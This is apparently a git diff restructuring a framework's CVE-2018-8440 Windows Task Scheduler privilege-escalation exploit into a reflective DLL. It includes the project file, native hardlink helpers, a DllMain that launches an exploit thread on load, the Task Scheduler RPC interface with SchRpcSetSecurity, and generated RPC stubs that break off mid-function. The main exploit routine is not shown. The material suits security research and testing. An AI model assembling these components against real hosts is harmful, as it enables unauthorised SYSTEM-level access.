{93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;xsd + + + + + Source Files + + + Header Files + + + Header Files + + + Header Files + + + + + Source Files + + + Source Files + + + Source Files + + + Source Files + + + Source Files + + + + + Source Files + + + + + + + + \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/~AutoRecover.ALPC-TaskSched-LPE.vcxproj b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj similarity index 92% rename from external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/~AutoRecover.ALPC-TaskSched-LPE.vcxproj rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj index ba4eeb6771..46a021173f 100755 --- a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/~AutoRecover.ALPC-TaskSched-LPE.vcxproj +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj @@ -1,179 +1,174 @@ - - - - - Debug - Win32 - - - Release - Win32 - - - Debug - x64 - - - Release - x64 - - - - 15.0 - {E75DCF6C-9B6D-49C8-96D7-0003C127B449} - Win32Proj - Poc_StorSvc - 10.0.16299.0 - ALPC-TaskSched-LPE - - - - Application - true - v141 - Unicode - - - Application - false - v141 - true - Unicode - - - Application - true - v141 - Unicode - - - DynamicLibrary - false - v120 - true - Unicode - - - - - - - - - - - - - - - - - - - - - true - - - true - - - false - - - false - - - - Use - Level3 - Disabled - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - - - Console - true - - - - - NotUsing - Level3 - Disabled - _DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - - - Console - true - - - - - Use - Level3 - MaxSpeed - true - true - WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - - - Console - true - true - true - - - - - NotUsing - Level3 - MaxSpeed - true - true - NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) - false - MultiThreaded - - - Console - true - true - true - xpsprint.lib;%(AdditionalDependencies) - - - - - - - - - - - - - - - MultiThreadedDLL - NotUsing - NotUsing - - - - - - - - - - - - - - - - + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 15.0 + {E75DCF6C-9B6D-49C8-96D7-0003C127B449} + Win32Proj + Poc_StorSvc + 10.0.16299.0 + ALPC-TaskSched-LPE + + + + Application + true + v141 + Unicode + + + Application + false + v141 + true + Unicode + + + Application + true + v141 + Unicode + + + DynamicLibrary + false + v120 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + true + + + false + + + false + ..\..\..\..\ReflectiveDLLInjection\common;$(IncludePath) + + + + Use + Level3 + Disabled + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + NotUsing + Level3 + Disabled + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Use + Level3 + MaxSpeed + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + NotUsing + Level3 + MaxSpeed + true + true + NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) + false + MultiThreaded + + + Console + true + true + true + xpsprint.lib;%(AdditionalDependencies) + + + + + + + + + + + + + + + + MultiThreadedDLL + NotUsing + NotUsing + + + + + + + + + \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/dll/src/Hardlink.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/Hardlink.cpp similarity index 96% rename from external/source/exploits/CVE-2018-8440/dll/src/Hardlink.cpp rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/Hardlink.cpp index 3ee33ed0d9..3d53d5f319 100755 --- a/external/source/exploits/CVE-2018-8440/dll/src/Hardlink.cpp +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/Hardlink.cpp @@ -1,107 +1,106 @@ -// Copyright 2015 Google Inc. All Rights Reserved. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http ://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. - -#define UNICODE -#include "stdafx.h" -#include "ntimports.h" -#include "typed_buffer.h" -#include - -std::wstring BuildFullPath(const std::wstring& path, bool native) -{ - std::wstring ret; - WCHAR buf[MAX_PATH]; - - if (native) - { - ret = L"\\??\\"; - } - - if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0) - { - ret += buf; - } - else - { - ret += path; - } - - return ret; -} - -FARPROC GetProcAddressNT(LPCSTR lpName) -{ - return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName); -} - -HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options) -{ - UNICODE_STRING name = { 0 }; - OBJECT_ATTRIBUTES obj_attr = { 0 }; - - DEFINE_NTDLL(RtlInitUnicodeString); - DEFINE_NTDLL(NtOpenFile); - - if (path) - { - fRtlInitUnicodeString(&name, path); - InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr); - } - else - { - InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr); - } - - HANDLE h = nullptr; - IO_STATUS_BLOCK io_status = { 0 }; - NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options); - if (NT_SUCCESS(status)) - { - return h; - } - else - { - return nullptr; - } -} - -bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname) -{ - std::wstring full_linkname = BuildFullPath(linkname, true); - size_t len = full_linkname.size() * sizeof(WCHAR); - - typed_buffer_ptr link_info(sizeof(FILE_LINK_INFORMATION) + len - sizeof(WCHAR)); - - memcpy(&link_info->FileName[0], full_linkname.c_str(), len); - link_info->ReplaceIfExists = TRUE; - link_info->FileNameLength = len; - - std::wstring full_targetname = BuildFullPath(targetname, true); - - HANDLE hFile = OpenFileNative(full_targetname.c_str(), nullptr, MAXIMUM_ALLOWED, FILE_SHARE_READ, 0); - if (hFile) - { - DEFINE_NTDLL(ZwSetInformationFile); - IO_STATUS_BLOCK io_status = { 0 }; - - NTSTATUS status = fZwSetInformationFile(hFile, &io_status, link_info, link_info.size(), FileLinkInformation); - CloseHandle(hFile); - if (NT_SUCCESS(status)) - { - return true; - } - } - - return false; +// Copyright 2015 Google Inc. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http ://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include "stdafx.h" +#include "ntimports.h" +#include "typed_buffer.h" +#include + +std::wstring BuildFullPath(const std::wstring& path, bool native) +{ + std::wstring ret; + WCHAR buf[MAX_PATH]; + + if (native) + { + ret = L"\\??\\"; + } + + if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0) + { + ret += buf; + } + else + { + ret += path; + } + + return ret; +} + +FARPROC GetProcAddressNT(LPCSTR lpName) +{ + return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName); +} + +HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options) +{ + UNICODE_STRING name = { 0 }; + OBJECT_ATTRIBUTES obj_attr = { 0 }; + + DEFINE_NTDLL(RtlInitUnicodeString); + DEFINE_NTDLL(NtOpenFile); + + if (path) + { + fRtlInitUnicodeString(&name, path); + InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr); + } + else + { + InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr); + } + + HANDLE h = nullptr; + IO_STATUS_BLOCK io_status = { 0 }; + NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options); + if (NT_SUCCESS(status)) + { + return h; + } + else + { + return nullptr; + } +} + +bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname) +{ + std::wstring full_linkname = BuildFullPath(linkname, true); + size_t len = full_linkname.size() * sizeof(WCHAR); + + typed_buffer_ptr link_info(sizeof(FILE_LINK_INFORMATION) + len - sizeof(WCHAR)); + + memcpy(&link_info->FileName[0], full_linkname.c_str(), len); + link_info->ReplaceIfExists = TRUE; + link_info->FileNameLength = len; + + std::wstring full_targetname = BuildFullPath(targetname, true); + + HANDLE hFile = OpenFileNative(full_targetname.c_str(), nullptr, MAXIMUM_ALLOWED, FILE_SHARE_READ, 0); + if (hFile) + { + DEFINE_NTDLL(ZwSetInformationFile); + IO_STATUS_BLOCK io_status = { 0 }; + + NTSTATUS status = fZwSetInformationFile(hFile, &io_status, link_info, link_info.size(), FileLinkInformation); + CloseHandle(hFile); + if (NT_SUCCESS(status)) + { + return true; + } + } + + return false; } \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp new file mode 100755 index 0000000000..c48f4271c8 --- /dev/null +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/dllmain.cpp @@ -0,0 +1,23 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "stdafx.h" + +DWORD CALLBACK ExploitThread(LPVOID hModule); + +BOOL APIENTRY DllMain(HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved +) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + CreateThread(NULL, 0, ExploitThread, hModule, 0, NULL); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/external/source/exploits/CVE-2018-8440/dll/src/ntimports.h b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ntimports.h similarity index 97% rename from external/source/exploits/CVE-2018-8440/dll/src/ntimports.h rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ntimports.h index 4bee8021e5..f3a00a4e75 100755 --- a/external/source/exploits/CVE-2018-8440/dll/src/ntimports.h +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ntimports.h @@ -1,51 +1,51 @@ -#pragma once - -#include -#include - -#define DIRECTORY_QUERY 0x0001 -#define DIRECTORY_TRAVERSE 0x0002 -#define DIRECTORY_CREATE_OBJECT 0x0004 -#define DIRECTORY_CREATE_SUBDIRECTORY 0x0008 -#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) - -typedef NTSTATUS(NTAPI *_NtCreateDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes); -typedef NTSTATUS(NTAPI *_NtCreateDirectoryObjectEx)(PHANDLE Handle, ACCESS_MASK DesiredAccess, - POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ShadowDir, BOOLEAN Something); -typedef NTSTATUS(NTAPI *_NtOpenDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes); -typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString); - -#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) - -typedef NTSTATUS(NTAPI* _NtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName); -typedef NTSTATUS(NTAPI* _NtOpenSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes); -typedef NTSTATUS(NTAPI* _NtQuerySymbolicLinkObject)(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength); -typedef NTSTATUS(NTAPI* _NtOpenFile)( - _Out_ PHANDLE FileHandle, - _In_ ACCESS_MASK DesiredAccess, - _In_ POBJECT_ATTRIBUTES ObjectAttributes, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _In_ ULONG ShareAccess, - _In_ ULONG OpenOptions - ); - -const ULONG FileLinkInformation = 11; - -typedef struct _FILE_LINK_INFORMATION { - BOOLEAN ReplaceIfExists; - HANDLE RootDirectory; - ULONG FileNameLength; - WCHAR FileName[1]; -} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; - -typedef NTSTATUS(__stdcall *_ZwSetInformationFile)( - _In_ HANDLE FileHandle, - _Out_ PIO_STATUS_BLOCK IoStatusBlock, - _In_ PVOID FileInformation, - _In_ ULONG Length, - _In_ ULONG FileInformationClass - ); -typedef ULONG(NTAPI* _RtlNtStatusToDosError)(NTSTATUS status); -void SetNtLastError(NTSTATUS status); - -#define DEFINE_NTDLL(x) _ ## x f ## x = (_ ## x)GetProcAddressNT(#x) +#pragma once + +#include +#include + +#define DIRECTORY_QUERY 0x0001 +#define DIRECTORY_TRAVERSE 0x0002 +#define DIRECTORY_CREATE_OBJECT 0x0004 +#define DIRECTORY_CREATE_SUBDIRECTORY 0x0008 +#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) + +typedef NTSTATUS(NTAPI *_NtCreateDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes); +typedef NTSTATUS(NTAPI *_NtCreateDirectoryObjectEx)(PHANDLE Handle, ACCESS_MASK DesiredAccess, + POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ShadowDir, BOOLEAN Something); +typedef NTSTATUS(NTAPI *_NtOpenDirectoryObject)(PHANDLE Handle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes); +typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString); + +#define SYMBOLIC_LINK_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0x1) + +typedef NTSTATUS(NTAPI* _NtCreateSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING TargetName); +typedef NTSTATUS(NTAPI* _NtOpenSymbolicLinkObject)(PHANDLE LinkHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes); +typedef NTSTATUS(NTAPI* _NtQuerySymbolicLinkObject)(HANDLE LinkHandle, PUNICODE_STRING LinkTarget, PULONG ReturnedLength); +typedef NTSTATUS(NTAPI* _NtOpenFile)( + _Out_ PHANDLE FileHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _In_ ULONG ShareAccess, + _In_ ULONG OpenOptions + ); + +const ULONG FileLinkInformation = 11; + +typedef struct _FILE_LINK_INFORMATION { + BOOLEAN ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; + +typedef NTSTATUS(__stdcall *_ZwSetInformationFile)( + _In_ HANDLE FileHandle, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _In_ PVOID FileInformation, + _In_ ULONG Length, + _In_ ULONG FileInformationClass + ); +typedef ULONG(NTAPI* _RtlNtStatusToDosError)(NTSTATUS status); +void SetNtLastError(NTSTATUS status); + +#define DEFINE_NTDLL(x) _ ## x f ## x = (_ ## x)GetProcAddressNT(#x) diff --git a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/rpc.idl b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc.idl similarity index 96% rename from external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/rpc.idl rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc.idl index 041eb15306..d0fddfcfc8 100755 --- a/external/source/exploits/CVE-2018-8440/ALPC-TaskSched-LPE/rpc.idl +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc.idl @@ -1,166 +1,166 @@ -import "oaidl.idl"; -import "ocidl.idl"; - -[ - uuid(86d35949-83c9-4044-b424-db363231fd0c), - version(1.0), -] -interface DefaultIfName -{ - - typedef struct Struct_18_t - { - [unique][string] wchar_t* StructMember0; - [unique][string] wchar_t* StructMember1; - long StructMember2; - }Struct_18_t; - - typedef struct Struct_74_t - { - long StructMember0; - long StructMember1; - [unique][string] wchar_t* StructMember2; - [unique][string] wchar_t* StructMember3; - }Struct_74_t; - - typedef struct Struct_144_t - { - long StructMember0; - short StructMember1; - short StructMember2; - byte StructMember3[8]; - }Struct_144_t; - - typedef struct Struct_246_t - { - short StructMember0; - short StructMember1; - short StructMember2; - short StructMember3; - short StructMember4; - short StructMember5; - short StructMember6; - short StructMember7; - }Struct_246_t; - - long _SchRpcHighestVersion( - [out]long *arg_1); - - long _SchRpcRegisterTask( - [in][unique][string] wchar_t* arg_1, - [in][string] wchar_t* arg_2, - [in]long arg_3, - [in][unique][string] wchar_t* arg_4, - [in]long arg_5, - [in]long arg_6, - [in][unique] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_6)] /* */ struct Struct_18_t* arg_7, - [out][ref][string] wchar_t** arg_8, - [out][ref]struct Struct_74_t** arg_9); - - long SchRpcRetrieveTask( - [in][string] wchar_t* arg_1, - [in][string] wchar_t* arg_2, - [in]long *arg_3, - [out][ref][string] wchar_t** arg_4); - - long _SchRpcCreateFolder( - [in][string] wchar_t* arg_1, - [in][unique][string] wchar_t* arg_2, - [in]long arg_3); - - long _SchRpcSetSecurity( - [in][string] wchar_t* arg_1, - [in][string] wchar_t* arg_2, - [in]long arg_3); - - long _SchRpcGetSecurity( - [in][string] wchar_t* arg_1, - [in]long arg_2, - [out][ref][string] wchar_t** arg_3); - - long _SchRpcEnumFolders( - [in][string] wchar_t* arg_1, - [in]long arg_2, - [in][out]long *arg_3, - [in]long arg_4, - [out]long *arg_5, - [out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_5)] /* */[string] wchar_t*** arg_6); - - long _SchRpcEnumTasks( - [in][string] wchar_t* arg_1, - [in]long arg_2, - [in][out]long *arg_3, - [in]long arg_4, - [out]long *arg_5, - [out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_5)] /* */[string] wchar_t*** arg_6); - - long _SchRpcEnumInstances( - [in][unique][string] wchar_t* arg_1, - [in]long arg_2, - [out]long *arg_3, - [out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_3)] /* */ struct Struct_144_t** arg_4); - - long _SchRpcGetInstanceInfo( - [in]struct Struct_144_t* arg_1, - [out][ref][string] wchar_t** arg_2, - [out]long *arg_3, - [out][ref][string] wchar_t** arg_4, - [out][ref][string] wchar_t** arg_5, - [out]long *arg_6, - [out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_6)] /* */ struct Struct_144_t** arg_7, - [out]long *arg_8); - - long _SchRpcStopInstance( - [in]struct Struct_144_t* arg_1, - [in]long arg_2); - - long _SchRpcStop( - [in][unique][string] wchar_t* arg_1, - [in]long arg_2); - - long _SchRpcRun( - [in][string] wchar_t* arg_1, - [in]long arg_2, - [in][unique] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_2)] /* */[string] wchar_t** arg_3, - [in]long arg_4, - [in]long arg_5, - [in][unique][string] wchar_t* arg_6, - [out]struct Struct_144_t* arg_7); - - long _SchRpcDelete( - [in][string] wchar_t* arg_1, - [in]long arg_2); - - long _SchRpcRename( - [in][string] wchar_t* arg_1, - [in][string] wchar_t* arg_2, - [in]long arg_3); - - long _SchRpcScheduledRuntimes( - [in][string] wchar_t* arg_1, - [in][unique]struct Struct_246_t* arg_2, - [in][unique]struct Struct_246_t* arg_3, - [in]long arg_4, - [in]long arg_5, - [out]long *arg_6, - [out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_6)] /* */ struct Struct_246_t** arg_7); - - long _SchRpcGetLastRunInfo( - [in][string] wchar_t* arg_1, - [out]struct Struct_246_t* arg_2, - [out]long *arg_3); - - long _SchRpcGetTaskInfo( - [in][string] wchar_t* arg_1, - [in]long arg_2, - [out]long *arg_3, - [out]long *arg_4); - - long _SchRpcGetNumberOfMissedRuns( - [in][string] wchar_t* arg_1, - [out]long *arg_2); - - long _SchRpcEnableTask( - [in][string] wchar_t* arg_1, - [in]long arg_2); +import "oaidl.idl"; +import "ocidl.idl"; + +[ + uuid(86d35949-83c9-4044-b424-db363231fd0c), + version(1.0), +] +interface DefaultIfName +{ + + typedef struct Struct_18_t + { + [unique][string] wchar_t* StructMember0; + [unique][string] wchar_t* StructMember1; + long StructMember2; + }Struct_18_t; + + typedef struct Struct_74_t + { + long StructMember0; + long StructMember1; + [unique][string] wchar_t* StructMember2; + [unique][string] wchar_t* StructMember3; + }Struct_74_t; + + typedef struct Struct_144_t + { + long StructMember0; + short StructMember1; + short StructMember2; + byte StructMember3[8]; + }Struct_144_t; + + typedef struct Struct_246_t + { + short StructMember0; + short StructMember1; + short StructMember2; + short StructMember3; + short StructMember4; + short StructMember5; + short StructMember6; + short StructMember7; + }Struct_246_t; + + long _SchRpcHighestVersion( + [out]long *arg_1); + + long _SchRpcRegisterTask( + [in][unique][string] wchar_t* arg_1, + [in][string] wchar_t* arg_2, + [in]long arg_3, + [in][unique][string] wchar_t* arg_4, + [in]long arg_5, + [in]long arg_6, + [in][unique] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_6)] /* */ struct Struct_18_t* arg_7, + [out][ref][string] wchar_t** arg_8, + [out][ref]struct Struct_74_t** arg_9); + + long SchRpcRetrieveTask( + [in][string] wchar_t* arg_1, + [in][string] wchar_t* arg_2, + [in]long *arg_3, + [out][ref][string] wchar_t** arg_4); + + long _SchRpcCreateFolder( + [in][string] wchar_t* arg_1, + [in][unique][string] wchar_t* arg_2, + [in]long arg_3); + + long _SchRpcSetSecurity( + [in][string] wchar_t* arg_1, + [in][string] wchar_t* arg_2, + [in]long arg_3); + + long _SchRpcGetSecurity( + [in][string] wchar_t* arg_1, + [in]long arg_2, + [out][ref][string] wchar_t** arg_3); + + long _SchRpcEnumFolders( + [in][string] wchar_t* arg_1, + [in]long arg_2, + [in][out]long *arg_3, + [in]long arg_4, + [out]long *arg_5, + [out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_5)] /* */[string] wchar_t*** arg_6); + + long _SchRpcEnumTasks( + [in][string] wchar_t* arg_1, + [in]long arg_2, + [in][out]long *arg_3, + [in]long arg_4, + [out]long *arg_5, + [out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_5)] /* */[string] wchar_t*** arg_6); + + long _SchRpcEnumInstances( + [in][unique][string] wchar_t* arg_1, + [in]long arg_2, + [out]long *arg_3, + [out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_3)] /* */ struct Struct_144_t** arg_4); + + long _SchRpcGetInstanceInfo( + [in]struct Struct_144_t* arg_1, + [out][ref][string] wchar_t** arg_2, + [out]long *arg_3, + [out][ref][string] wchar_t** arg_4, + [out][ref][string] wchar_t** arg_5, + [out]long *arg_6, + [out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_6)] /* */ struct Struct_144_t** arg_7, + [out]long *arg_8); + + long _SchRpcStopInstance( + [in]struct Struct_144_t* arg_1, + [in]long arg_2); + + long _SchRpcStop( + [in][unique][string] wchar_t* arg_1, + [in]long arg_2); + + long _SchRpcRun( + [in][string] wchar_t* arg_1, + [in]long arg_2, + [in][unique] /* [DBG] FC_BOGUS_ARRAY */[size_is(arg_2)] /* */[string] wchar_t** arg_3, + [in]long arg_4, + [in]long arg_5, + [in][unique][string] wchar_t* arg_6, + [out]struct Struct_144_t* arg_7); + + long _SchRpcDelete( + [in][string] wchar_t* arg_1, + [in]long arg_2); + + long _SchRpcRename( + [in][string] wchar_t* arg_1, + [in][string] wchar_t* arg_2, + [in]long arg_3); + + long _SchRpcScheduledRuntimes( + [in][string] wchar_t* arg_1, + [in][unique]struct Struct_246_t* arg_2, + [in][unique]struct Struct_246_t* arg_3, + [in]long arg_4, + [in]long arg_5, + [out]long *arg_6, + [out][ref] /* [DBG] FC_BOGUS_ARRAY */[size_is(, *arg_6)] /* */ struct Struct_246_t** arg_7); + + long _SchRpcGetLastRunInfo( + [in][string] wchar_t* arg_1, + [out]struct Struct_246_t* arg_2, + [out]long *arg_3); + + long _SchRpcGetTaskInfo( + [in][string] wchar_t* arg_1, + [in]long arg_2, + [out]long *arg_3, + [out]long *arg_4); + + long _SchRpcGetNumberOfMissedRuns( + [in][string] wchar_t* arg_1, + [out]long *arg_2); + + long _SchRpcEnableTask( + [in][string] wchar_t* arg_1, + [in]long arg_2); } \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8440/dll/src/rpc_c.c b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c similarity index 96% rename from external/source/exploits/CVE-2018-8440/dll/src/rpc_c.c rename to external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c index 4283d0040d..3c13285d76 100755 --- a/external/source/exploits/CVE-2018-8440/dll/src/rpc_c.c +++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c @@ -1,2012 +1,2012 @@ - - -/* this ALWAYS GENERATED file contains the RPC client stubs */ - - - /* File created by MIDL compiler version 8.00.0603 */ -/* at Fri Sep 14 13:09:25 2018 - */ -/* Compiler settings for rpc.idl: - Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 - protocol : dce , ms_ext, c_ext, robust - error checks: allocation ref bounds_check enum stub_data - VC __declspec() decoration level: - __declspec(uuid()), __declspec(selectany), __declspec(novtable) - DECLSPEC_UUID(), MIDL_INTERFACE() -*/ -/* @@MIDL_FILE_HEADING( ) */ - -#if defined(_M_AMD64) - - -#pragma warning( disable: 4049 ) /* more than 64k source lines */ -#if _MSC_VER >= 1200 -#pragma warning(push) -#endif - -#pragma warning( disable: 4211 ) /* redefine extern to static */ -#pragma warning( disable: 4232 ) /* dllimport identity*/ -#pragma warning( disable: 4024 ) /* array to pointer mapping*/ - -#include - -#include "rpc_h.h" - -#define TYPE_FORMAT_STRING_SIZE 295 -#define PROC_FORMAT_STRING_SIZE 1207 -#define EXPR_FORMAT_STRING_SIZE 1 -#define TRANSMIT_AS_TABLE_SIZE 0 -#define WIRE_MARSHAL_TABLE_SIZE 0 - -typedef struct _rpc_MIDL_TYPE_FORMAT_STRING - { - short Pad; - unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; - } rpc_MIDL_TYPE_FORMAT_STRING; - -typedef struct _rpc_MIDL_PROC_FORMAT_STRING - { - short Pad; - unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; - } rpc_MIDL_PROC_FORMAT_STRING; - -typedef struct _rpc_MIDL_EXPR_FORMAT_STRING - { - long Pad; - unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; - } rpc_MIDL_EXPR_FORMAT_STRING; - - -static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = -{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; - - -extern const rpc_MIDL_TYPE_FORMAT_STRING rpc__MIDL_TypeFormatString; -extern const rpc_MIDL_PROC_FORMAT_STRING rpc__MIDL_ProcFormatString; -extern const rpc_MIDL_EXPR_FORMAT_STRING rpc__MIDL_ExprFormatString; - -#define GENERIC_BINDING_TABLE_SIZE 0 - - -/* Standard interface: DefaultIfName, ver. 1.0, - GUID={0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}} */ - - - -static const RPC_CLIENT_INTERFACE DefaultIfName___RpcClientInterface = - { - sizeof(RPC_CLIENT_INTERFACE), - {{0x86d35949,0x83c9,0x4044,{0xb4,0x24,0xdb,0x36,0x32,0x31,0xfd,0x0c}},{1,0}}, - {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, - 0, - 0, - 0, - 0, - 0, - 0x00000000 - }; -RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcClientInterface; - -extern const MIDL_STUB_DESC DefaultIfName_StubDesc; - -static RPC_BINDING_HANDLE DefaultIfName__MIDL_AutoBindHandle; - - -long _SchRpcHighestVersion( - /* [in] */ handle_t IDL_handle, - /* [out] */ long *arg_1) -{ - - CLIENT_CALL_RETURN _RetVal; - - _RetVal = NdrClientCall2( - ( PMIDL_STUB_DESC 